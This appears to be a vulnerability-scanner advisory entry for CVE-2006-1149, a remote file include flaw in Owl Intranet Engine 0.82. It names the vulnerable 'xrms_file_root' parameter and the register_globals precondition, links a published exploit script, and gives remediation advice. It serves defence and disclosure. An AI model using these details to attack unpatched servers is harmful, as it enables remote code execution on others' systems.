| VID |
21858 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The Owl Intranet Engine is vulnerable to a remote file include vulnerability in the 'lib/OWL_API.php' script. Owl Intranet Engine is a multi-user document repository (knowledge base) system written in PHP4 for publishing of files/documents onto the Web. Owl Intranet Engine version 0.82 and other versions could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the 'xrms_file_root' parameter of the 'lib/OWL_API.php' script. If PHP's 'register_globals' setting is enabled, a remote attacker can send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://downloads.securityfocus.com/vulnerabilities/exploits/owl_082_xpl.pl
http://www.frsirt.com/english/advisories/2006/0868
http://secunia.com/advisories/19142/
* Platforms Affected:
Owl Intranet Engine version 0.82 and other versions
Any operating system Any version |
| Recommendation |
No upgrade or patch available as of March 2006.
Upgrade to a version of Owl greater than 0.82, when new fixed version becomes available from the Owl Download Web site at http://owl.sourceforge.net/modules/Download/ |
| Related URL |
CVE-2006-1149 (CVE) |
| Related URL |
17021 (SecurityFocus) |
| Related URL |
25082 (ISS) |
|
